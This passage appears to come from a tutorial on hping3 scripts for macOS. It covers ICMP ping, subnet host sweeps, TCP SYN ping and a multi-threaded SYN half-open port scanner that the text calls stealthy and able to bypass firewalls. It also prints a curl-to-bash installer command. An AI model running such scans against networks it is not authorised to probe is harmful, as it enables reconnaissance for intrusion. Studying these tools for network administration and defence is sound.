hping3 -1 -c "$COUNT" -i "$INTERVAL" -V "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Color the output based on content
    if echo "$line" | grep -q "len="; then
        echo -e "${GREEN}✓ $line${NC}"
        ((SUCCESS_COUNT++))
    elif echo "$line" | grep -q -E "Unreachable|timeout|no answer|Host Unreachable"; then
        echo -e "${RED}✗ $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q -E "HPING|Statistics"; then
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q -E "round-trip|transmitted|received|packet loss"; then
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get hping3's exit status (first command in the pipeline; $? here would only
# reflect the colorizing while-loop, so use zsh's pipestatus array instead)
EXIT_STATUS=${pipestatus[1]}

# Display summary
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Parse statistics from hping3 output if available
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS=$(grep -E "transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS" ]]; then
        echo -e "${CYAN}Statistics:${NC}"
        echo "  $STATS"
    fi
fi

# Final status
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    echo -e "${GREEN}[✓] ICMP ping completed successfully${NC}"
else
    echo -e "${YELLOW}[!] ICMP ping completed with warnings (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./icmp_ping.sh

How to Run:

### Basic Examples

# 1. Ping a domain with default settings (4 packets, 1 second interval)
./icmp_ping.sh google.com

# 2. Ping an IP address with default settings
./icmp_ping.sh 8.8.8.8

# 3. Ping localhost for testing
./icmp_ping.sh localhost
./icmp_ping.sh 127.0.0.1

### Custom Packet Count

# 4. Send 10 packets to Google DNS
./icmp_ping.sh 8.8.8.8 10

# 5. Send just 1 packet (quick connectivity test)
./icmp_ping.sh cloudflare.com 1

# 6. Send 20 packets for extended testing
./icmp_ping.sh example.com 20


### Custom Interval Between Packets

# 7. Send 5 packets with 2-second intervals
./icmp_ping.sh google.com 5 2

# 8. Rapid ping - 10 packets with 0.5 second intervals
./icmp_ping.sh 1.1.1.1 10 0.5

# 9. Slow ping - 3 packets with 3-second intervals
./icmp_ping.sh yahoo.com 3 3

### Real-World Scenarios

# 10. Test local network gateway (common router IPs)
./icmp_ping.sh 192.168.1.1 5
./icmp_ping.sh 192.168.0.1 5
./icmp_ping.sh 10.0.0.1 5

# 11. Test multiple DNS servers
./icmp_ping.sh 8.8.8.8 3        # Google Primary DNS
./icmp_ping.sh 8.8.4.4 3        # Google Secondary DNS
./icmp_ping.sh 1.1.1.1 3        # Cloudflare DNS
./icmp_ping.sh 9.9.9.9 3        # Quad9 DNS

# 12. Test internal network hosts
./icmp_ping.sh 192.168.1.100 5
./icmp_ping.sh 10.0.0.50 10 0.5

# 13. Extended connectivity test
./icmp_ping.sh github.com 100 1

# 14. Quick availability check
./icmp_ping.sh microsoft.com 2 0.5

### Diagnostic Examples

# 15. Test for packet loss (send many packets)
./icmp_ping.sh aws.amazon.com 50 0.2

# 16. Test latency consistency (slow intervals)
./icmp_ping.sh google.com 10 3

# 17. Stress test (if needed)
./icmp_ping.sh 127.0.0.1 100 0.1

# 18. Test VPN connection
./icmp_ping.sh 10.8.0.1 5        # Common VPN gateway

### Special Use Cases

# 19. Test IPv6 connectivity (if supported)
./icmp_ping.sh ipv6.google.com 4

# 20. Test CDN endpoints
./icmp_ping.sh cdn.cloudflare.com 5
./icmp_ping.sh fastly.com 5

# 21. Get help
./icmp_ping.sh -h
./icmp_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to ping
– **count** (optional, default: 4): Number of ICMP packets to send
– **interval** (optional, default: 1): Seconds to wait between packets

How It Works:
1. `hping3 -1`: Sets hping3 to ICMP mode (equivalent to traditional ping)
2. `-c $count`: Limits the number of packets sent
3. `-i $interval`: Sets the delay between packets (in seconds)
4. `$target`: Specifies the destination host

Script 2: ICMP Network Sweep

Purpose:
Performs ICMP ping sweeps across a network range to discover all active hosts. This technique is useful for network enumeration but may be noisy and easily detected.
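
Stripped of parallelism, colors, and reporting, the sweep reduces to a loop like this sketch (192.168.1 is a placeholder network; the hping3 flags and the "len=" reply check mirror the script's check_host function):

# Minimal sequential sweep of 192.168.1.1-254; the full script below adds parallel workers and a results file
for i in $(seq 1 254); do
    sudo hping3 -1 -c 1 "192.168.1.$i" 2>/dev/null | grep -q "len=" && echo "alive: 192.168.1.$i"
done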

Create the Script:

cat > ./icmp_sweep.sh << 'EOF'
#!/bin/zsh

# ICMP Network Sweep Script using hping3
# Scans a network range to find active hosts using ICMP ping
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
NETWORK="$1"
START_IP="${2:-1}"
END_IP="${3:-254}"

# Function to print usage
print_usage() {
    local script_name="./icmp_sweep.sh"
    echo "Usage: $script_name <network> [start_ip] [end_ip]"
    echo "  network  - Network prefix (e.g., 192.168.1)"
    echo "  start_ip - Starting IP in the last octet (default: 1)"
    echo "  end_ip   - Ending IP in the last octet (default: 254)"
    echo ""
    echo "Examples:"
    echo "  $script_name 192.168.1          # Scan 192.168.1.1-254"
    echo "  $script_name 10.0.0 1 100       # Scan 10.0.0.1-100"
    echo "  $script_name 172.16.5 50 150    # Scan 172.16.5.50-150"
}

# Function to validate IP range
validate_ip_range() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Start and end IPs must be numbers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 0 ] || [ "$start" -gt 255 ] || [ "$end" -lt 0 ] || [ "$end" -gt 255 ]; then
        echo -e "${RED}Error: IP range must be between 0-255${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start IP must be less than or equal to end IP${NC}"
        return 1
    fi
    
    return 0
}

# Function to check if host is alive
check_host() {
    local ip=$1

    # Send a single ICMP echo request; hping3 gives up on its own shortly after the
    # last packet, so no separate timeout flag is used (hping3's -W is --winid, not a
    # timeout). Reply lines look like "len=46 ip=... rtt=... ms", so match on "len=".
    if hping3 -1 -c 1 "$ip" 2>/dev/null | grep -q "len="; then
        return 0
    else
        return 1
    fi
}

# Check for help flag
if [[ "$NETWORK" == "-h" ]] || [[ "$NETWORK" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if network is provided
if [ -z "$NETWORK" ]; then
    echo -e "${RED}Error: No network specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate IP range
if ! validate_ip_range "$START_IP" "$END_IP"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP sweep requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total hosts to scan
TOTAL_HOSTS=$((END_IP - START_IP + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         ICMP NETWORK SWEEP             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Network:${NC}     $NETWORK.0/24"
echo -e "  ${BLUE}Range:${NC}       $NETWORK.$START_IP - $NETWORK.$END_IP"
echo -e "  ${BLUE}Total Hosts:${NC} $TOTAL_HOSTS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary files for results
ALIVE_FILE=$(mktemp)
SCAN_LOG=$(mktemp)
trap "rm -f $ALIVE_FILE $SCAN_LOG" EXIT

# Start time
START_TIME=$(date +%s)

echo -e "${GREEN}[+] Starting ICMP sweep...${NC}"
echo -e "${YELLOW}[*] This may take a while for large networks${NC}"
echo ""

# Progress tracking
SCANNED=0
ALIVE=0
MAX_PARALLEL=50  # Maximum parallel processes to avoid overwhelming the system

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d hosts)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
echo -e "${BLUE}Scanning in progress...${NC}"
for i in $(seq $START_IP $END_IP); do
    IP="$NETWORK.$i"
    
    # Run scan in background with limited parallelism
    {
        if check_host "$IP"; then
            echo "$IP" >> "$ALIVE_FILE"
            echo -e "\n${GREEN}[✓] Host alive: $IP${NC}"
        fi
    } &
    
    # Limit concurrent processes
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$MAX_PARALLEL" ]; do
        sleep 0.1
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_HOSTS"
done

# Wait for all background jobs to complete
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Count alive hosts
if [ -s "$ALIVE_FILE" ]; then
    ALIVE=$(wc -l < "$ALIVE_FILE" | tr -d ' ')
else
    ALIVE=0
fi

# Clear progress line and display results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

if [ "$ALIVE" -gt 0 ]; then
    echo -e "${GREEN}[✓] Active hosts found: $ALIVE${NC}"
    echo ""
    echo -e "${MAGENTA}Live Hosts:${NC}"
    echo -e "${CYAN}───────────────────────${NC}"
    
    # Sort and display alive hosts
    sort -t . -k 4 -n "$ALIVE_FILE" | while read -r host; do
        echo -e "  ${GREEN}▸${NC} $host"
    done
    
    # Save results to file
    RESULTS_FILE="icmp_sweep_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "ICMP Network Sweep Results"
        echo "=========================="
        echo "Network: $NETWORK.0/24"
        echo "Range: $NETWORK.$START_IP - $NETWORK.$END_IP"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Active Hosts ($ALIVE found):"
        echo "----------------------------"
        sort -t . -k 4 -n "$ALIVE_FILE"
    } > "$RESULTS_FILE"
    
    echo ""
    echo -e "${CYAN}───────────────────────${NC}"
    echo -e "${BLUE}[*] Results saved to: $RESULTS_FILE${NC}"
else
    echo -e "${YELLOW}[-] No active hosts found in range${NC}"
    echo -e "${YELLOW}    This could mean:${NC}"
    echo -e "${YELLOW}    • Hosts are blocking ICMP${NC}"
    echo -e "${YELLOW}    • Network is unreachable${NC}"
    echo -e "${YELLOW}    • Firewall is blocking requests${NC}"
fi

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Total Scanned:${NC} $TOTAL_HOSTS hosts"
echo -e "  ${BLUE}Alive:${NC}         $ALIVE hosts"
echo -e "  ${BLUE}No Response:${NC}   $((TOTAL_HOSTS - ALIVE)) hosts"
echo -e "  ${BLUE}Success Rate:${NC}  $(( ALIVE * 100 / TOTAL_HOSTS ))%"
echo -e "  ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./icmp_sweep.sh

How to Run:

# Scan entire subnet (default: .1 to .254)
./icmp_sweep.sh 192.168.1

# Scan specific range
./icmp_sweep.sh 10.0.0 1 100

# Scan custom range
./icmp_sweep.sh 172.16.5 50 150

# Get help
./icmp_sweep.sh --help

Parameters Explained:
– **network** (required): Network base (e.g., “192.168.1” for 192.168.1.0/24)
– **start_ip** (optional, default: 1): Starting host number in the range
– **end_ip** (optional, default: 254): Ending host number in the range

MacOS Optimizations:
– Limits concurrent processes to prevent system overload (see the throttle sketch after this list)
– Uses temporary files for result collection
– Includes progress indicators for long scans
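
The concurrency cap mentioned in the first item boils down to a simple job-count throttle; this sketch restates the idea outside the script (MAX_PARALLEL defaults to 50 there):

# Wait whenever the number of running background jobs reaches the cap
while [ "$(jobs -r | wc -l)" -ge "$MAX_PARALLEL" ]; do
    sleep 0.1
done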

Script 3: TCP SYN Ping

Purpose:
Uses TCP SYN packets instead of ICMP to test host availability. This technique can bypass firewalls that block ICMP while allowing TCP traffic to specific ports.
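
The probe underneath the script is a single SYN packet: in the reply, flags=SA means the port answered (open) and flags=RA means it was refused (closed), which is exactly what the script's output parser looks for. A minimal hand-run version, with a placeholder target, looks like:

# One-off TCP SYN ping against port 443; read the flags= field in any reply line
sudo hping3 -S -p 443 -c 4 example.com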

Create the Script:

cat > ./tcp_syn_ping.sh << 'EOF'
#!/bin/zsh

# TCP SYN Ping Script using hping3
# Tests TCP connectivity using SYN packets (TCP half-open scan)
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT="${2:-80}"
COUNT="${3:-4}"
INTERVAL="${4:-1}"

# Common ports reference
declare -A COMMON_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_ping.sh"
    echo "Usage: $script_name <target> [port] [count] [interval]"
    echo "  target   - Hostname or IP address to test"
    echo "  port     - TCP port to test (default: 80)"
    echo "  count    - Number of SYN packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name google.com             # Test port 80"
    echo "  $script_name google.com 443         # Test HTTPS port"
    echo "  $script_name ssh.example.com 22 5   # Test SSH with 5 packets"
    echo "  $script_name 192.168.1.1 80 10 0.5  # 10 packets, 0.5s interval"
    echo ""
    echo "Common Ports:"
    echo "  22  - SSH        443 - HTTPS     3306 - MySQL"
    echo "  80  - HTTP       445 - SMB       5432 - PostgreSQL"
    echo "  21  - FTP        25  - SMTP      6379 - Redis"
    echo "  53  - DNS        110 - POP3      8080 - HTTP-Alt"
}

# Function to validate port
validate_port() {
    local port=$1
    
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port must be a number${NC}"
        return 1
    fi
    
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name for port
get_service_name() {
    local port=$1
    if [[ -n "${COMMON_PORTS[$port]}" ]]; then
        echo "${COMMON_PORTS[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port
if ! validate_port "$PORT"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Get service name
SERVICE_NAME=$(get_service_name "$PORT")

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         TCP SYN PING UTILITY           ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Port:${NC}     $PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "  ${BLUE}Method:${NC}   TCP SYN (Half-open scan)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with TCP SYN mode
echo -e "${GREEN}[+] Starting TCP SYN ping...${NC}"
echo ""

# Statistics tracking
SUCCESS_COUNT=0
FAIL_COUNT=0
TOTAL_RTT=0
MIN_RTT=999999
MAX_RTT=0

# Execute hping3 and process output
# -S: SYN packets
# -p: destination port
# -c: packet count
# -i: interval
hping3 -S -p "$PORT" -c "$COUNT" -i "$INTERVAL" "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Parse and colorize output
    if echo "$line" | grep -q "flags=SA"; then
        # SYN+ACK received (port open)
        echo -e "${GREEN}✓ Port $PORT open: $line${NC}"
        ((SUCCESS_COUNT++))
        
        # Extract RTT if available
        if echo "$line" | grep -q "rtt="; then
            RTT=$(echo "$line" | sed -n 's/.*rtt=\([0-9.]*\).*/\1/p')
            if [[ -n "$RTT" ]]; then
                TOTAL_RTT=$(echo "$TOTAL_RTT + $RTT" | bc)
                if (( $(echo "$RTT < $MIN_RTT" | bc -l) )); then
                    MIN_RTT=$RTT
                fi
                if (( $(echo "$RTT > $MAX_RTT" | bc -l) )); then
                    MAX_RTT=$RTT
                fi
            fi
        fi
    elif echo "$line" | grep -q "flags=RA"; then
        # RST+ACK received (port closed)
        echo -e "${RED}✗ Port $PORT closed: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "Unreachable\|timeout\|no answer"; then
        # No response or error
        echo -e "${RED}✗ No response: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "HPING.*mode set"; then
        # Header information
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q "Statistics\|transmitted\|received\|packet loss"; then
        # Statistics line
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get hping3's exit status (first command in the pipeline; $? here would only
# reflect the parsing while-loop, so use zsh's pipestatus array instead)
EXIT_STATUS=${pipestatus[1]}

# Parse final statistics from hping3 output
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Extract statistics from output
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS_LINE=$(grep -E "packets transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS_LINE" ]]; then
        echo -e "${GREEN}          STATISTICS${NC}"
        echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
        
        # Parse transmitted, received, loss
        TRANSMITTED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ packets transmitted" | grep -oE "^[0-9]+")
        RECEIVED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ received" | grep -oE "^[0-9]+")
        LOSS=$(echo "$STATS_LINE" | grep -oE "[0-9]+% packet loss" | grep -oE "^[0-9]+")
        
        if [[ -n "$TRANSMITTED" ]] && [[ -n "$RECEIVED" ]]; then
            echo -e "  ${BLUE}Packets Sent:${NC}     $TRANSMITTED"
            echo -e "  ${BLUE}Replies Received:${NC} $RECEIVED"
            echo -e "  ${BLUE}Packet Loss:${NC}      ${LOSS:-0}%"
            
            # Port status determination
            if [[ "$RECEIVED" -gt 0 ]]; then
                echo -e "  ${BLUE}Port Status:${NC}      ${GREEN}OPEN (Responding)${NC}"
            else
                echo -e "  ${BLUE}Port Status:${NC}      ${RED}CLOSED/FILTERED${NC}"
            fi
        fi
        
        # RTT statistics if available
        if [[ "$SUCCESS_COUNT" -gt 0 ]] && [[ "$TOTAL_RTT" != "0" ]]; then
            AVG_RTT=$(echo "scale=2; $TOTAL_RTT / $SUCCESS_COUNT" | bc)
            echo ""
            echo -e "  ${BLUE}RTT Statistics:${NC}"
            echo -e "    Min: ${MIN_RTT}ms"
            echo -e "    Max: ${MAX_RTT}ms"
            echo -e "    Avg: ${AVG_RTT}ms"
        fi
    fi
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Final status message
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    if grep -q "flags=SA" "$TMPFILE" 2>/dev/null; then
        echo -e "${GREEN}[✓] TCP port $PORT on $TARGET is OPEN${NC}"
        echo -e "${GREEN}    Service: $SERVICE_NAME${NC}"
    elif grep -q "flags=RA" "$TMPFILE" 2>/dev/null; then
        echo -e "${YELLOW}[!] TCP port $PORT on $TARGET is CLOSED${NC}"
        echo -e "${YELLOW}    The host is reachable but the port is not accepting connections${NC}"
    else
        echo -e "${RED}[✗] TCP port $PORT on $TARGET is FILTERED or host is down${NC}"
        echo -e "${RED}    No response received - possible firewall blocking${NC}"
    fi
else
    echo -e "${RED}[✗] TCP SYN ping failed (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./tcp_syn_ping.sh

How to Run:

# Test default HTTP port (80)
./tcp_syn_ping.sh google.com

# Test HTTPS port
./tcp_syn_ping.sh google.com 443

# Test SSH port with 5 packets
./tcp_syn_ping.sh ssh.example.com 22 5

# Test with custom interval (0.5 seconds)
./tcp_syn_ping.sh 192.168.1.1 80 10 0.5

# Test database ports
./tcp_syn_ping.sh db.example.com 3306      # MySQL
./tcp_syn_ping.sh db.example.com 5432      # PostgreSQL
./tcp_syn_ping.sh cache.example.com 6379   # Redis

# Get help
./tcp_syn_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to test
– **port** (optional, default: 80): TCP port to send SYN packets to
– **count** (optional, default: 1): Number of SYN packets to send
– **interval** (optional): Seconds to wait between packets (fourth argument, e.g. 0.5)

Response Analysis:
– **SYN+ACK response**: Port is open
– **RST response**: Port is closed
– **No response**: Port is filtered
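
For reference, the probe the script wraps is a single hping3 SYN packet; a minimal equivalent one-liner (hostname and port are placeholders):

# Send one SYN to TCP/443; a reply with "flags=SA" means open,
# "flags=RA" means closed, and no reply suggests filtering
sudo hping3 -S -p 443 -c 1 example.com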

Script 4: TCP SYN Port Scanner

Purpose:
Performs TCP SYN scanning across a range of ports to identify open services. This is a stealthy scanning technique that doesn’t complete the TCP handshake.
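
In a half-open scan the prober sends a SYN, reads the reply (SYN+ACK for an open port, RST for a closed one), and never sends the final ACK, so no full TCP connection is established and services that only log completed connections never see the probe.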

Create the Script:

cat > ./tcp_syn_scan.sh << 'EOF'
#!/bin/zsh

# TCP SYN Port Scanner using hping3
# Performs a TCP SYN scan (half-open scan) on a range of ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
START_PORT="${2:-1}"
END_PORT="${3:-1000}"
THREADS="${4:-50}"

# Common service ports
declare -A SERVICE_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [111]="RPC"
    [135]="MSRPC"
    [139]="NetBIOS"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [587]="SMTP-TLS"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_scan.sh"
    echo "Usage: $script_name <target> [start_port] [end_port] [threads]"
    echo "  target     - Hostname or IP address to scan"
    echo "  start_port - Starting port number (default: 1)"
    echo "  end_port   - Ending port number (default: 1000)"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan ports 1-1000"
    echo "  $script_name 192.168.1.1 1 100         # Scan ports 1-100"
    echo "  $script_name server.local 20 25        # Scan ports 20-25"
    echo "  $script_name example.com 1 65535 100   # Full scan with 100 threads"
    echo ""
    echo "Common Port Ranges:"
    echo "  1-1000      - Common ports (default)"
    echo "  1-65535     - All ports"
    echo "  20-445      - Common services"
    echo "  1024-5000   - User ports"
    echo "  49152-65535 - Dynamic/private ports"
}

# Function to validate port range
validate_ports() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port numbers must be integers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 1 ] || [ "$start" -gt 65535 ] || [ "$end" -lt 1 ] || [ "$end" -gt 65535 ]; then
        echo -e "${RED}Error: Port numbers must be between 1-65535${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name
get_service() {
    local port=$1
    if [[ -n "${SERVICE_PORTS[$port]}" ]]; then
        echo "${SERVICE_PORTS[$port]}"
    else
        # Try to get from system services file
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service "$port")
        echo "$port:open:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    elif echo "$result" | grep -q "flags=RA"; then
        # Port is closed (RST+ACK received)
        echo "$port:closed" >> "${tmpfile}.closed"
    else
        # Port is filtered or no response
        echo "$port:filtered" >> "${tmpfile}.filtered"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port range
if ! validate_ports "$START_PORT" "$END_PORT"; then
    exit 1
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    echo -e "${RED}Error: Threads must be between 1-500${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command and create an appropriate wrapper
if command -v gtimeout &> /dev/null; then
    # macOS with coreutils installed provides gtimeout rather than timeout
    timeout() {
        gtimeout "$@"
    }
elif ! command -v timeout &> /dev/null; then
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    
    # Create wrapper function for timeout
    timeout() {
